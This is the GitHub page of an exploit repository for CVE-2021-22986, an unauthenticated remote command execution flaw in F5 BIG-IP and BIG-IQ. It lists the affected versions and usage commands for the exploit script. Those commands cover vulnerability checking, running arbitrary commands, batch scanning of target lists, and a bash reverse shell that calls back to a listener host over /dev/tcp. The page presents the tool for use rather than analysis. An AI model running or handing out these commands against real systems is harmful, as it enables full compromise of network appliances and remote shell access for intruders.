Skip to content

amitlttwo/CVE-2021-22986

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2021-22986

This vulnerability allows for unauthenticated attackers with network access to the iControl REST interface, through the BIG-IP management interface and self IP addresses, to execute arbitrary system commands, create or delete files, and disable services. This vulnerability can only be exploited through the control plane and cannot be exploited through the data plane. Exploitation can lead to complete system compromise. The BIG-IP system in Appliance mode is also vulnerable.

Vuln Product

F5 BIG-IQ 6.0.0-6.1.0 F5 BIG-IQ 7.0.0-7.0.0.1 F5 BIG-IQ 7.1.0-7.1.0.2 F5 BIG-IP 12.1.0-12.1.5.2 F5 BIG-IP 13.1.0-13.1.3.5 F5 BIG-IP 14.1.0-14.1.3.1 F5 BIG-IP 15.1.0-15.1.2 F5 BIG-IP 16.0.0-16.0.1

Usage

python3 CVE_2021_22986.py

Finding Vulnerability

python3 CVE_2021_22986.py -v true -u https://192.168.174.164

Command Execution

python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c id

Executing Command with whoami

python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c whoami

Batch Scan

python3 CVE_2021_22986.py -s true -f check.txt

Reverse Shell

python3 CVE_2021_22986.py -r true -u https://192.168.174.164 -c "bash -i >&/dev/tcp/192.168.174.129/8888 0>&1"

New PoC

python3 newpoc.py https://192.168.174.164

References:-

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages